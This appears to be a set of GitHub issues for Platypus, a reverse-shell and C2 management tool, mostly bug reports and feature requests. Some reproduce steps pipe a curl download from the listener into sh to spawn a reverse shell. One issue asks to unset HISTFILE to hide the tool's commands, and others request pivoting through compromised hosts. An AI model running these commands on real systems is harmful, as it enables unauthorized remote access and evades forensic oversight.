Privilege escalation attacks lead to a changed username, which is not reflected in the server listing. If I use a kernel exploit on a target to achieve root, the server does not update to this username - which is understandable, but makes keeping track of privileged shells a pain. Having the option to override the username of a node while jumped to it would be excellent. One could use "user username" to indicate the current node has the privileges of username

While on the topic, the ability to create brief note snippets to differentiate different shells would be useful - for example, it would be great to tag a node as a shell on a domain controller. One could use a command like "note notehere" to assign a note to the jumped-to client.

Description

If a client of a server is switched, for example to false, while others are true, that will be overruled when switching based on server id, ending with all nodes in the same state. 

Reproduce

1. go run platypus.go
2. Run 0.0.0.0 8080
3. connect a few reverse shells
4. switch one of them to datadispatch false
5. switch the server
6. the one set to false remains at false, as do its peers - causing a loss of "toggleness" to individual switching
7. switch the server again
8. all are true - however, two switches should revert all nodes to their original state. The one manually switched to false has had its state of switch lost.
   ...

Expected behavior

Each node is set to the inverse of its current datadispatcher state

Current behavior

Some nodes can have their states ignored

Screenshots/Terminal log

A demo of the issue is visible on pastebin: https://pastebin.com/n5zzWH1A

Send one command to all clients at once (Meta Command)
当使用 DataDispatcher 派发命令的时候后 ， 回显命令执行后的结果

Description

Adding logging capability to command sent, received, and both.

Reproduce

1. go run platypus.go
2. Run 0.0.0.0 8080
   ...

Expected behavior

Log commands and its output sent to the client for each specific session folder using hashes/codenames. Add "old_session_list" command to provide the possibility to view previous sessions. Use severity levels to manage your Golang logs volume by separating them into three categories - command sent, output received, and the combination of both.

• "print_history + md5hash/codename"
• https://github.com/gologme/log

Current behavior

No logging.

Screenshots/Terminal log

Environments

• Standard

Can you please add support for sending commands to all clients at once.
Thanks

Description

When interacting with a Windows reverse shell via the WebUI, input is not echoed until the page is refreshed.

Reproduce

1. ./Platypus_linux_amd64
2. Execute Remote Shell on Windows client
3. Launch shell in WebUI
4. Type dir and hit enter (no echo)
5. Refresh (see echo'd dir listing)

Expected behavior

Realtime echo of client as is seen in the main application

Current behavior

No echo unless browser is refreshed

Screenshots/Terminal log

N/A

Environments

Server

• OS: Debian Buster
• Version: 1.4.1

Client

• OS: Windows 10

Description

Adding a current session prompt setting showing what session the user is interacting with.

Reproduce

1. go run platypus.go
2. Run 0.0.0.0 8080
   ...

Expected behavior

Golden Duck - f4f2b36f04c6e688fb210df160e5acd8: ls
magic1 magic2 magic3

Current behavior

NONE

Screenshots/Terminal log

Environments

• Standard

--- I am going to attempt at the submitted bug reports. These are not bugs but rather additional capability.

• 多个GameBox通过同一出口IP访问Platypus，Platypus只会保留一个会话，因为多个GameBox的连接属于相同IP会自动断开新建的会话。
• 每次反弹shell都会使用随机端口，所以使用IP+端口进行唯一性判断也是不行的。

问题：
有没有其他好的办法可以解决这种同一出口IP的多会话管理？

Description

When using the docker container in non host mode, the external ip is detected as the containers network ip. There should be a optional setter in the config.yml:

• external ip
• external domain name (for first time setup for example)

Example:
detected: 172.18.0.2
real: 90.X.X.X (public host ip on e.g. eth0)

Reproduce

docker-compose.yml

version: '3'

services:
  app:
    container_name: platypus
    build: .
    tty: true
    #network_mode: host
    ports:
      - 127.0.0.1:7331:7331
      - 1337-1400:1337-1400
      - 13339:13339
    entrypoint: tmux new -s platypus ./platypus
    volumes:
      - ./config.yml:/app/config-v1.4.2.yml

docker-compose up -d

Expected behavior

IP or domain for connecting each server in the ui is displayed correctly (in list and setup) and services are connectable to the docker hosts public ip or domain

Current behavior

IP is falsely claimed to be the docker containers ip in the bridge network. No connection possible at all for reverse shell. Using domains for first time client setup is not possible

Screenshots/Terminal log

Environments

• OS: Ubuntu 18.04.1 LTS
• Version: 8cf7642 (master-08.07.21)

With kind regards,
miathedev

您好：

当我获取到了一个会话并通过 Jump -> PTY -> Interact 进入一个交互式 Shell

接着使用 exit 命令退出时

会出现显示 BUG 并且丢失会话

公网 VPS 测试：

并且会陷入未响应状态 无法退出

本地 Kali 测试：

Web 端的PTY 貌似也有类似的 bug ：使用 exit 退出后无法重新进入会话

而通过 Jump -> Interact 直接进入一个会话 并且使用 exit 命令退出时

会正常返回 Platypus 命令界面 并且会话依旧保持

比如 curl platypus:8080/a.py 就返回 python 的反弹 shell 代码，.../a.pl 就返回 perl 的。

1. Select termite server
2. Select the target platform
3. Manage trojans
4. Select a trojan when Upgrading

Description

I've been in a context where I need to exit a shell that has been spawned (let's say shell > pty > mysql), but not go back to platypus itself.
In this context, typing exit will quit the (platypus) interactive mode, yet not exit mysql.
Spawning a new pty (reset attempt) on this session will feed the "pty creation commands" to mysql instead of bash, making this session unusable / bricked.

It would be nice to have platypus exit command binded to something unused, like platyquit, exitplatypus or even goback.
Or maybe add an easy way to rename platypus commands in confirguration, like

cmdalias:
  exit: platyquit
  list: ls

Thanks so much for this awesome tool/C2, it's 🔥 ! 💟

Description

mac启动失败

Reproduce

./Platypus_darwin_amd64
[1] 68619 killed ./Platypus_darwin_amd64
...

Expected behavior

Current behavior

Screenshots/Terminal log

Environments

• OS: mac bigsur
• Version: 11.5.1

for example, it would be great to tag a node as a shell on a domain controller. One could use a command like "note notehere" to assign a note to the jumped-to client.

You can try to use the Alias command, the alias of a client can be considered as a short note of it.

I am trying to design the database structures and the frontend of platypus recently, your requirements like note notehere will be implemented in future releases. As you know currently all data structures are store in memory instead of a database. It will be useful if all data are stored in a database. At that time, we can easily retrospective the process of pen-testing. even we can record all interactions of all clients like https://asciinema.org/.

(🐧) 192.168.88.129:40166 [root] » info
+----------------------------------+----------------------+----+------+--------+----------------+-------+---------------+
| HASH                             | NETWORK              | OS | USER | PYTHON | TIME           | ALIAS | GROUPDISPATCH |
+----------------------------------+----------------------+----+------+--------+----------------+-------+---------------+
| aff357164147ff1a675804dce70c5fff | 192.168.88.129:40166 | 🐧 | root | true   | 23 seconds ago |       | true          |
+----------------------------------+----------------------+----+------+--------+----------------+-------+---------------+
(🐧) 192.168.88.129:40166 [root] » alias router
2021/05/07 10:21:25 Renaming session: [aff357164147ff1a675804dce70c5fff] tcp://192.168.88.129:40166 (connected at: 1 minute ago) [🐧] [true]
2021/05/07 10:21:35 A new income connection from 192.168.88.129:40172
2021/05/07 10:21:35 A RaaS request from 192.168.88.129:40172 served
2021/05/07 10:21:35 A new income connection from 192.168.88.129:40174
2021/05/07 10:21:38 Gathering information from client...
2021/05/07 10:21:40 Fire in the hole: [1cb67e3b0999c30aae95bfd73e0cb3bd] tcp://192.168.88.129:40174 [🐧]
[router] (🐧) 192.168.88.129:40166 [root] » Jump 1cb67e3b0999c30aae95bfd73e0cb3bd
2021/05/07 10:21:44 The current interactive shell is set to: [1cb67e3b0999c30aae95bfd73e0cb3bd] tcp://192.168.88.129:40174 (connected at: 9 seconds ago) [🐧] [true]
(🐧) 192.168.88.129:40174 [polaris] » Alias web
2021/05/07 10:21:50 Renaming session: [1cb67e3b0999c30aae95bfd73e0cb3bd] tcp://192.168.88.129:40174 (connected at: 14 seconds ago) [🐧] [true]
[web] (🐧) 192.168.88.129:40174 [polaris] » Jump router
2021/05/07 10:21:54 The current interactive shell is set to: [aff357164147ff1a675804dce70c5fff] tcp://192.168.88.129:40166 (connected at: 2 minutes ago) [🐧] [true]
[router] (🐧) 192.168.88.129:40166 [root] » Jump web
2021/05/07 10:21:56 The current interactive shell is set to: [1cb67e3b0999c30aae95bfd73e0cb3bd] tcp://192.168.88.129:40174 (connected at: 21 seconds ago) [🐧] [true]
[web] (🐧) 192.168.88.129:40174 [polaris] » 

Originally posted by @WangYihang in #40 (comment)

# cat /root/.bash_history 
ZNYo3dtcbYNOt9b4
 echo RQ3y2eV3; uname ; echo qpqYIAfb
 echo xcgNrS4G && whoami ; echo 7YLdiFZI
 echo 7beLrQc0 && which python2 ; echo aCH5uwkn
 echo 5b2G5Npm && which python3 ; echo 9o8mTu9N
 echo pPKpsIAF && ls /sys/class/net ; echo BMqqtI4z
 echo b0pgTn4E && ls /sys/class/net/eth0/address ; echo 6tpgrD2j
 echo lFokBgKs && cat /sys/class/net/eth0/address ; echo 1mFQoWqj
 echo gzhoSuVB && ls /sys/class/net/lo/address ; echo uAE7Hlrg
 echo 7FuHpHbV && cat /sys/class/net/lo/address ; echo AjcQHbet

Would it be possible to run unset HISTFILE before doing all the above?

From Windows 10 to Linux, PTY works, but sets terminal rows and columns always both to 0.
So things like nano are not usable.

Description

When a client is closed down via 'kill' the connection persists in the WebUI

Reproduce

1. ./Platypus_linux_amd64
2. curl http://127.0.0.1:3333|sh (on client)
3. kill -9 <process_id> (on client)
4. Refresh WebUI

Expected behavior

After a period of time, the connection should be dropped from the WebUI

Current behavior

Client remains available within WebUI until Platypus is closed. Refreshing WebUI persists the connection however won't connect as the shell has been closed on the client.

Screenshots/Terminal log

Environments

• OS: Debian Buster
• Version: 1.4.1

Description

Color coding the received stdout to separate the two operations.

Reproduce

1. go run platypus.go
2. Run 0.0.0.0 8080
   ...

Expected behavior

Current behavior

Both STDIN and STDOUT have the same color which can be confusing when interaction within a operation.

Screenshots/Terminal log

Environments

• Standard.

Seems to be inconsistent between distributions, normally you would get bash commands stored in memory until written to history file. But in this case seems to just disable them completely (which is not bad).
I would leave it personally as you done and just allow it on the config as I said above.
Let me know what you think.

Good idea!

Originally posted by @WangYihang in #46 (comment)

Description

Use a name generator to create a verb + an object to create an easily identifiable session. 
This will allow brains to separate session based on the name. 
Adding a hash next to the ops name will secure the possibility of same code names.

Reproduce

1. go run platypus.go
2. Run 0.0.0.0 8080
   ...

Expected behavior

Golden Duck - [f4f2b36f04c6e688fb210df160e5acd8]

Current behavior

f4f2b36f04c6e688fb210df160e5acd8

Screenshots/Terminal log

Environments

• Standard

Hi, It would be great to add keepalive to connected session

docker-compose exec app tmux a -t platypus
ERROR: No container found for app_1

Hey, I have some questions. The List command's output‘s last field is Interactive field：

>> List
[79809a986dd1c6e38850002f4eb52deb] tcp://127.0.0.1:46536 (connected at: 2 minutes ago) [false]



fmt.Sprintf("[%s] %s://%s (connected at: %s) [%t]", c.Hash, addr.Network(), addr.String(), humanize.Time(c.TimeStamp), c.Interactive)

Should it be the Group instead of Interactive?
In codes, the Interactive field only means if the node is in interactive mode, it's set to true at the beginning of the Interactive command then be set back to false to false at the end, so I can never see the field is false in List command's output
And the Switching set client.Group = !client.Group, the group field means whether dispath command to this client.
If it's a typo? And I think the filed name Group is not clear enough

Originally posted by @EddieIvan01 in #6 (comment)

Is there any way you can add the ability to launch the 'Run IP PORT' command from the command line when you launch platypus? like platypus -Run IP PORT or something?? that way I can have it setup and ready with a simple command, instead of running the application, then giving it commands to listen or whatever...... I hope that makes sense.

Would be really nice to be able to customize while executing Platypus all the relative timeouts expected once the shell from the victims arrive

Description

Describe your problem here

First of all: I REALLY love this tool!

The tool has a big issue with ROT13 encoding while gathering info from the target, which prevents from identifying the system and so the use of the core upload/ download functions. Can you please take a look into it? It just blocks the core functions.

Reproduce

1. any tool using ROT13 to decode the incoming commands and to encode the output of the commands
2. socat to act as a proxy: socat tcp-listen:10000,bind=127.0.0.1,fork,reuseaddr 'system:"stdbuf -o0 tr a-zA-Z n-za-mN-ZA-M | socat - tcp:localhost:10001 | stdbuf -o0 tr a-zA-Z n-za-mN-ZA-M"'
3. go run platypus.go
4. Run 127.0.0.1 10001
   ...

Expected behavior

output/ input correctly handled for the commands ran from the tool itself ( uname, etc etc.. )

Current behavior

output/ input not correctly handled ran from the tool itself ( uname, etc etc.. )

Screenshots/Terminal log

Environments

• OS: Linux kali 5.10.0-kali2-amd64 #1 SMP Debian 5.10.9-1kali1 (2021-01-22) x86_64 GNU/Linux
• Version: 1.5.0

Great app, is there an environmental variable or something to have it auto start a server on launch?

This is exactly what I was looking for, re: remote systems management behind firewalls. (we own the equipment).

Just might need to learn some go :)

Something going wrong. Connection gets terminated.. I don't think is related to HISTFILE change.

» jump b52b1beba97bfaa7c54e7abeaa3b2f5d
2021/05/18 10:37:40 The current interactive shell is set to: [b52b1beba97bfaa7c54e7abeaa3b2f5d] tcp://xxx.xxx.xxx.xxx:34558 (connected at: 7 minutes ago) [🐧] [true]
(🐧) xxx.xxx.xxx.xxx:34558 [root] » pty
2021/05/18 10:37:43 spawning /bin/bash on the current client
2021/05/18 10:37:43 attcker window size: (378, 63)                                                                                                                                                                                                                                                                                                                                        
2021/05/18 10:37:43 reseting client terminal...                                                                                                                                                                                                                                                                                                                                           
2021/05/18 10:37:43 reseting client SHELL...                                                                                                                                                                                                                                                                                                                                              
2021/05/18 10:37:43 reseting client TERM colors...                                                                                                                                                                                                                                                                                                                                        
2021/05/18 10:37:43 reseting client window size...                                                                                                                                                                                                                                                                                                                                        
(🐧) xxx.xxx.xxx.xxx:34558 [root] » interact
2021/05/18 10:37:45 Interacting with [b52b1beba97bfaa7c54e7abeaa3b2f5d] tcp://xxx.xxx.xxx.xxx:34558 (connected at: 7 minutes ago) [🐧] [true]
2021/05/18 10:37:45 Setting attacker terminal to raw mode                                                                                                                                                                                                                                                                                                                                 
                                                                                                                                                                                                                                                                                                                                                                                          
2021/05/18 10:37:46 Write to client failed, 
»

Originally posted by @RAF-87 in #46 (comment)

I will consider upgrading platypus to a system service.
There are a lot of tasks to do.
It requires front-end and back-end separation and builds platypus into system services.

Originally posted by @WangYihang in #16 (comment)

Description

When I try to run the Makefile it seems like it installs nvm (line 9) but at 'sudo nvm install --lts'(line 10) it gives me an error that nvm does not exist.

Reproduce

1. cd Platypus
2. make
   ...

Expected behavior

Should run and install without an error i think

Current behavior

Doesn't install nvm correctly

Environments

• OS: Ubuntu 20.04.2 LTS
• OS: Ubuntu server 20.04.2
• OS: Kali 2021.1
• OS: Parrot 4.11.2
• OS: Debian 10
• Version: 1.5.0

Extra

In Line 5 'add-apt-repository...' takes forever but this is due to an ipv6 DNS routing issue which i found out can be solved by deactivating ipv6 until reboot and everything is fine

@zxyxx @WangYihang Can you make to replace new connection from same IP with old one? Like if a client with 1.2.3.4 IP connected 10 minutes ago and it sent another session now from same IP, Platypus replace new session with the old one and remove old one.

Originally posted by @ariadarkkkis in #7 (comment)

WebUI uses web socket to connect to client machines, however if behind a firewall you receive the following on a loop:

Reconnecting
Connection Closed

Command line version allows interactive shell as normal. Would like to be able to connect via the WebUI to the client using the same approach (ie. no port forwarding needed).

Could you make the CLI case insensitive? It would be nice to have the option to input help or Help and have the tool function as expected.

Description

can't run/build the source code

Reproduce

1. go run .\platypus.go

lib\util\compiler\compiler.go:15:2: no required module provides package github.com/WangYihang/Platypus/lib/util/resource; to add it:
        go get github.com/WangYihang/Platypus/lib/util/resource

2. go get github.com/WangYihang/Platypus/lib/util/resource

go get: module github.com/WangYihang/Platypus/lib/util/resource: reading https://goproxy.cn/github.com/%21wang%21yihang/%21platypus/lib/util/resource/@v/list: 404 Not Found
        server response: not found: module github.com/WangYihang/Platypus/lib/util/resource: no matching versions for query "latest"

...

Environments

• OS: Win 10 1809
• Go version: go version go1.16.5 windows/amd64
• Source version: latest

Description

I would like for the platypus listener to support encryption such as AES or SSL.
Describe your problem here

The Platypus server currently does not support encryption which means the commands are send in cleartext over the network.

Reproduce

1. go run platypus.go
2. Run 0.0.0.0 8080
   ...
3. Encrypt [hash of listener] /path/to/ssl.crt /path/to/ssl.key

Expected behavior

The entire connection has end to end encryption

Current behavior

The connection can be eavesdropped by anyone using a wire sniffer.

Screenshots/Terminal log

Environments

• OS: Ubuntu 18.04.1 LTS
• Version: 1.1.0

It would be nice to be able to use compromised targets as proxies to allow pivoting into a target's network. This feature would greatly improve the utility of the tool and enable it to be used as a flexible and powerful C2 framework for pentesting engagements.

I got the server Running, then ran the REST command successfully, but when I visit the page in a web browser, I get a 404 error... please advise!

It would be useful to be able to set all clients to interact mode for datadispatcher, or deselect them, rather than having to specify them individually.

Description

When using reverse shells from Windows (tested with Powershell, unknown if present in other methods), results from commands (especially the gci or dir command) will often present out-of-order, or omit several of lines of output. 

Reproduce

1. go run platypus.go
2. Run 0.0.0.0 8080
3. Launch a powershell reverse shell of choice towards listener
4. Interact and use gci command a few times - move directories and try there also
   ...

Expected behavior

Output should be returned as it would directly on the system

Current behavior

Output is sometimes corrupted - lines are out of order or omitted in the response

Description

Describe your problem here

Reproduce

1. go run platypus.go
2. curl http://1.3.3.7/api/server

Expected behavior

return servers information

Current behavior

platypus got crash.

Screenshots/Terminal log

2021/08/16 15:50:09 [Recovery] 2021/08/16 - 15:50:09 panic recovered:
json: unsupported type: func() (io.ReadCloser, error)
/home/runner/go/pkg/mod/github.com/gin-gonic/[email protected]/render/json.go:59 (0xa546a6)
/home/runner/go/pkg/mod/github.com/gin-gonic/[email protected]/context.go:841 (0xa5acc8)
/home/runner/go/pkg/mod/github.com/gin-gonic/[email protected]/context.go:884 (0xaf9b04)
/home/runner/work/Platypus/Platypus/lib/context/restful.go:334 (0xaf99a1)
/home/runner/go/pkg/mod/github.com/gin-gonic/[email protected]/context.go:161 (0xa6ab90)
/home/runner/go/pkg/mod/github.com/gin-gonic/[email protected]/recovery.go:83 (0xa6ab77)
/home/runner/go/pkg/mod/github.com/gin-gonic/[email protected]/context.go:161 (0xa69c13)
/home/runner/go/pkg/mod/github.com/gin-gonic/[email protected]/logger.go:241 (0xa69bd2)
/home/runner/go/pkg/mod/github.com/gin-gonic/[email protected]/context.go:161 (0xa60d4f)
/home/runner/go/pkg/mod/github.com/gin-gonic/[email protected]/gin.go:409 (0xa60d36)
/home/runner/go/pkg/mod/github.com/gin-gonic/[email protected]/gin.go:367 (0xa607ec)
/opt/hostedtoolcache/go/1.16.5/x64/src/net/http/server.go:2887 (0x798082)
/opt/hostedtoolcache/go/1.16.5/x64/src/net/http/server.go:1952 (0x7934ac)
/opt/hostedtoolcache/go/1.16.5/x64/src/runtime/asm_amd64.s:1371 (0x46e900)

Environments

• OS: Ubuntu 20.04.1 LTS
• Version: 1.5.0

Description

尝试了上一版本是正常的

Reproduce

1. go run platypus.go
2. Run 0.0.0.0 8080
   ...

Expected behavior

Current behavior

Screenshots/Terminal log

Environments

• OS: Ubuntu 18.04.1 LTS
• Version: 1.1.0